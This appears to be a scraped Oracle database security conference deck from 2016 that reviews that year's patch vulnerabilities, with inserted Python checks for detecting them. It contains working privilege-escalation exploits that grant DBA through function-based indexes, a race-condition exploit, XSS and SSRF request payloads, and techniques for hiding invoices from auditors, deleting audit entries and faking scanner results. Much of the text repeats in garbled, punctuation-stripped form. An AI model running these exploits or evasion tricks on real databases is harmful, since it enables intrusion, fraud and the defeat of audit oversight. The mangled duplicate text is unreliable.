Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and, as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

  sqlplus sysman_apm/rds@ora1
  SQL> desc dba_users
  ERROR:
  ORA-04043: object "SYS"."DBA_USERS" does not exist

  ==> user does not have the privilege to access DBA_USERS
  SQL> select * from user_sys_privs;
  USERNAME      PRIVILEGE              ADM
  ------------- ---------------------- ---
  SYSMAN_APM    UNLIMITED TABLESPACE   NO
  SYSMAN_APM    CREATE VIEW            NO
  SYSMAN_APM    CREATE ANY LIBRARY     NO
  SYSMAN_APM    CREATE SEQUENCE        NO
  SYSMAN_APM    CREATE TABLE           NO
  SYSMAN_APM    CREATE LIBRARY         NO
  SYSMAN_APM    CREATE ANY INDEX       NO

  ==> CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
  SQL> select * from user_role_privs;
  USERNAME      GRANTED_ROLE   ADM DEF OS_
  ------------- -------------- --- --- ---
  SYSMAN_APM    CONNECT        NO  YES NO
  SYSMAN_APM    RESOURCE       NO  YES NO

  ==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
  SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
         PRAGMA AUTONOMOUS_TRANSACTION;
       BEGIN
         execute immediate 'grant dba to public';
         COMMIT;
         RETURN FOO;
       END;
       /

  ==> Grant execution privileges to PUBLIC
  SQL> grant execute on getdba to public;

  ==> Create an index on SYSTEM.HELP using a function-based index (FBI); the function getdba is used for the function-based index
  SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

  ==> Reconnect is necessary
  SQL> select * from dba_role_privs where granted_role = 'DBA' and grantee = 'PUBLIC';
  GRANTEE   GRANTED_ROLE   ADM DEF
  --------- -------------- --- ---
  PUBLIC    DBA            NO  YES
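Both FBI escalations in this deck (CVE-2016-3489 above and CVE-2016-5604 here) leave the same traces in the data dictionary: an index expression on a SYS- or SYSTEM-owned table that calls a function from another schema, and the INDEX or CREATE ANY INDEX grant that made creating the index possible. The Python below is an added example, not part of the deck; it runs those two checks over constructed rows shaped like DBA_IND_EXPRESSIONS, DBA_SYS_PRIVS and DBA_TAB_PRIVS. Index and function names mirror the demos, the other rows are invented, and the set of privileged owners is an assumption to tune per site.

```python
import re

# Constructed rows in the shape of DBA_IND_EXPRESSIONS (index_owner, index_name,
# table_owner, table_name, column_expression).  Not real catalog output; the first
# two rows mirror the EXPLOIT_INDEX demos, the other two are harmless examples.
IND_EXPRESSIONS = [
    {"index_owner": "SYSTEM", "index_name": "EXPLOIT_INDEX", "table_owner": "SYS",
     "table_name": "INCVID", "column_expression": '"SYSTEM"."GETDBA"("VERSION")'},
    {"index_owner": "SYSMAN_APM", "index_name": "EXPLOIT_INDEX", "table_owner": "SYSTEM",
     "table_name": "HELP", "column_expression": '"SYSMAN_APM"."GETDBA"("TOPIC")'},
    {"index_owner": "HR", "index_name": "EMP_NAME_UPPER_IX", "table_owner": "HR",
     "table_name": "EMPLOYEES", "column_expression": 'UPPER("LAST_NAME")'},
    {"index_owner": "SYS", "index_name": "I_OBJ_HASH", "table_owner": "SYS",
     "table_name": "OBJ$", "column_expression": '"SYS"."STANDARD_HASH"("NAME")'},
]
# Constructed rows in the shape of DBA_SYS_PRIVS and DBA_TAB_PRIVS.
SYS_PRIVS = [{"grantee": "SYSMAN_APM", "privilege": "CREATE ANY INDEX"},
             {"grantee": "WMSYS", "privilege": "CREATE ANY INDEX"},
             {"grantee": "HR", "privilege": "CREATE TABLE"}]
TAB_PRIVS = [{"grantee": "SYSTEM", "owner": "SYS", "table_name": "INCVID", "privilege": "INDEX"},
             {"grantee": "HR", "owner": "OE", "table_name": "ORDERS", "privilege": "SELECT"}]

# Schemas whose tables an FBI should never hand to a foreign function.
# Assumption: starting set only, extend with the Oracle-maintained schemas in use.
PRIVILEGED_OWNERS = {"SYS", "SYSTEM", "WMSYS", "DVSYS", "XDB"}

# Matches a schema-qualified call such as "SYSTEM"."GETDBA"( in an index expression.
FUNC_CALL = re.compile(r'"([A-Z0-9_$#]+)"\."([A-Z0-9_$#]+)"\s*\(')


def cross_schema_fbi(rows, privileged=PRIVILEGED_OWNERS):
    """Index expressions on privileged tables that call a function owned by some
    other schema.  Returns (table_owner, table_name, index_name, function)."""
    findings = []
    for r in rows:
        if r["table_owner"] not in privileged:
            continue
        for owner, func in FUNC_CALL.findall(r["column_expression"]):
            if owner != r["table_owner"]:
                findings.append((r["table_owner"], r["table_name"],
                                 r["index_name"], f"{owner}.{func}"))
    return findings


def index_privilege_grants(sys_privs, tab_privs, privileged=PRIVILEGED_OWNERS):
    """Who may create indexes on privileged tables: every CREATE ANY INDEX holder
    except SYS, plus direct INDEX grants on privileged owners' tables."""
    out = [(p["grantee"], "CREATE ANY INDEX", "*") for p in sys_privs
           if p["privilege"] == "CREATE ANY INDEX" and p["grantee"] != "SYS"]
    out += [(t["grantee"], "INDEX", f'{t["owner"]}.{t["table_name"]}') for t in tab_privs
            if t["privilege"] == "INDEX" and t["owner"] in privileged
            and t["grantee"] != t["owner"]]
    return out


if __name__ == "__main__":
    for f in cross_schema_fbi(IND_EXPRESSIONS):
        print("cross-schema FBI:", f)
    for g in index_privilege_grants(SYS_PRIVS, TAB_PRIVS):
        print("index grant:", g)
```

In a live database the rows come from `select index_owner, index_name, table_owner, table_name, column_expression from dba_ind_expressions` (COLUMN_EXPRESSION is a LONG column, so read it with a client that fetches LONGs), plus dba_sys_privs and dba_tab_privs. The ORA-06598 in the 12.1.0.2 transcript above shows INHERIT PRIVILEGES stopping the simple case, so on 12c a grant of INHERIT ANY PRIVILEGES to anyone but SYS belongs on the same report.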
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic

Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"

Scenario 2
Remove your own audit entries from the audit log, which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.

Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem, you will just deliver the proper results.

A lot of different wishes… but luckily we are using Oracle.

Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate the SQL statement.
Select value …
Oracle Data Redaction allows masking/manipulating the selected data just for a single database user.
Possible usage: replace true/false, replace USER/ADMIN, … the DBA can decide what will be returned.

Select value …
A typical query from security checklists/scanners looks like this:
  select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but it contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks…
… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
- modify views (e.g. add spare='DBA1' to the view dba_audit_trail): all entries of the OS user DBA1 will be removed from the view; if a SIEM solution retrieves the audit data, the entries of DBA1 are not retrieved
- create or change synonyms to "redirect" objects
- replace a table with a view plus an INSTEAD OF trigger

---------- dbms_macadm ----------
  FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
    TMP  VARCHAR2(32767);
    TMP2 VARCHAR2(32767);
  BEGIN
    SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
    IF LENGTH(TMP) = 4000 THEN
      RETURN 'N';
    END IF;
    TMP2 := UPPER(TMP);
    IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
      RETURN 'N';
    END IF;
    RETURN 'Y';
  END;

  SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
  SQL> grant select on sys.mydual to public;
  SQL> drop public synonym dual;
  SQL> create public synonym dual for sys.mydual;

SYS CAN INFLUENCE DVSYS-ANALYSIS VIA A VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
… where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name = 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.

Select value from table/view where x=y
The SQL Translation Framework (12c only) allows replacing an entire query: the user submits query A, and the SQL Translation Framework replaces query A with query B.

Possible Countermeasures for paranoid Auditors
- Add a random string (e.g. aksdjhiuz) to avoid the SQL Translation Framework (new SQL_ID)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
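Several of the countermeasures above can be automated from the data dictionary: verify where the public synonym DUAL points and what object type stands behind it (the redirection shown on the CVE-2016-3484 slide), checksum critical views against a baseline taken at hardening time, and list VPD policies on audit views plus any SQL translation profiles and redaction policies, which should only exist when the application really uses them. The Python below is an added example, not from the deck; it runs those checks over constructed rows shaped like DBA_SYNONYMS, DBA_OBJECTS, DBA_VIEWS, DBA_POLICIES, DBA_SQL_TRANSLATION_PROFILES and REDACTION_POLICIES (the view text and names are invented; in a real audit the rows come from querying those views).

```python
import hashlib
import re

# --- constructed catalog rows (invented; not real output of the views named) ---
SYNONYMS = [  # DBA_SYNONYMS
    {"owner": "PUBLIC", "synonym_name": "DUAL", "table_owner": "SYS", "table_name": "MYDUAL"},
    {"owner": "PUBLIC", "synonym_name": "DBA_USERS", "table_owner": "SYS", "table_name": "DBA_USERS"},
]
OBJECTS = [  # DBA_OBJECTS
    {"owner": "SYS", "object_name": "DUAL", "object_type": "TABLE"},
    {"owner": "SYS", "object_name": "MYDUAL", "object_type": "VIEW"},
    {"owner": "SYS", "object_name": "DBA_USERS", "object_type": "VIEW"},
]
GOOD_AUDIT_VIEW = "select os_username, username, action_name from sys.aud$ a"
CURRENT_VIEWS = {  # DBA_VIEWS: (owner, view_name) -> text, after someone "fixed" it
    ("SYS", "DBA_AUDIT_TRAIL"): GOOD_AUDIT_VIEW + " where a.os_username <> 'DBA1'",
}
VPD_POLICIES = [  # DBA_POLICIES
    {"object_owner": "SYS", "object_name": "DBA_AUDIT_TRAIL", "policy_name": "HIDE_ME", "enable": "YES"},
    {"object_owner": "APP", "object_name": "INVOICES", "policy_name": "ROW_SEC", "enable": "YES"},
]
TRANSLATION_PROFILES = [{"owner": "APP", "profile_name": "CHECKLIST_ANSWERS"}]  # DBA_SQL_TRANSLATION_PROFILES
REDACTION_POLICIES = [  # REDACTION_POLICIES
    {"object_owner": "APP", "object_name": "PARAMETER", "policy_name": "ALWAYS_TRUE", "column_name": "VALUE"},
]


def view_checksum(text: str) -> str:
    """Checksum of a view definition with whitespace and case normalized, so a
    re-formatted but unchanged view does not raise a false alarm."""
    norm = re.sub(r"\s+", " ", text.strip().lower())
    return hashlib.sha256(norm.encode("utf-8")).hexdigest()


# Baseline recorded at hardening time (here computed from the known-good text).
BASELINE = {("SYS", "DBA_AUDIT_TRAIL"): view_checksum(GOOD_AUDIT_VIEW)}


def check_synonyms(synonyms, objects, must_be=(("DUAL", "SYS", "DUAL", "TABLE"),)):
    """Public synonyms for critical names must point at the expected SYS object,
    and that object must still have the expected type."""
    types = {(o["owner"], o["object_name"]): o["object_type"] for o in objects}
    findings = []
    for name, exp_owner, exp_name, exp_type in must_be:
        for s in synonyms:
            if s["owner"] != "PUBLIC" or s["synonym_name"] != name:
                continue
            target = (s["table_owner"], s["table_name"])
            if target != (exp_owner, exp_name):
                findings.append(f"synonym {name} redirected to {target[0]}.{target[1]}")
            elif types.get(target) != exp_type:
                findings.append(f"{target[0]}.{target[1]} is a {types.get(target)}, expected {exp_type}")
    return findings


def check_view_checksums(current, baseline):
    """Views whose normalized definition no longer matches the recorded checksum."""
    return [f"view {o}.{v} changed since baseline" for (o, v), text in current.items()
            if baseline.get((o, v)) != view_checksum(text)]


def check_vpd_on_audit(policies):
    """Enabled VPD policies on DBA_AUDIT* views filter what the SIEM pulls."""
    return [f"VPD policy {p['policy_name']} on {p['object_owner']}.{p['object_name']}"
            for p in policies if p["enable"] == "YES" and p["object_name"].startswith("DBA_AUDIT")]


def check_query_rewriting(profiles, redaction):
    """Every SQL translation profile and redaction policy is worth a second look."""
    out = [f"SQL translation profile {p['owner']}.{p['profile_name']}" for p in profiles]
    out += [f"redaction policy {r['policy_name']} on "
            f"{r['object_owner']}.{r['object_name']}.{r['column_name']}" for r in redaction]
    return out


def run_all():
    return (check_synonyms(SYNONYMS, OBJECTS)
            + check_view_checksums(CURRENT_VIEWS, BASELINE)
            + check_vpd_on_audit(VPD_POLICIES)
            + check_query_rewriting(TRANSLATION_PROFILES, REDACTION_POLICIES))


if __name__ == "__main__":
    for finding in run_all():
        print(finding)
```

The checksum baseline has to be stored outside the database being audited; otherwise the same DBA who edits the view can refresh the baseline.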
Modifying Queries on the fly
Powerful features for applications.
(Huge) potential on critical systems to modify application logic (e.g. DB Vault).
DBAs and Auditors/Security Departments should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if not in use.

Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Patches
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
